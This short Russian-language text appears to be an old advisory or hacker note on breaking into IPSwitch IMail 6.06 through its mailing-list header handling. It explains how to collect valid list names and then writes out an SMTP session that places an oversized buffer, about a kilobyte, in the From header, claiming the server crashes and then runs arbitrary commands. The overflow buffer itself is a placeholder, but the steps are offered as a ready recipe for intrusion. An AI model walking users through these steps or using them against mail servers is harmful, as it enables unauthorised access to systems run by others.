Через IPSwitch IMail
6.06 можно проникнуть в систему. Дело в том,
что демон неправильно обрабатывает данные,
содержащиеся в заголовках мэил-листов. Для
исполнения команд надо знать правильное
имя мэил-лсита, получить имена можно, послав
письмо на адрес imailsrv@example.com со словом в теле
list. Теперь делаем следующее:
helo eeyerulez
mailfrom: <>
rcpt to: valid_mailing_list
data From: [buffer] example.com
To: Whatever
wohooo!
.quit
[buffer] должен быть
большим - порядка килобайта.
После такого
нелицеприятного послания IMail рушится и
позволяет выполнить любую команду.
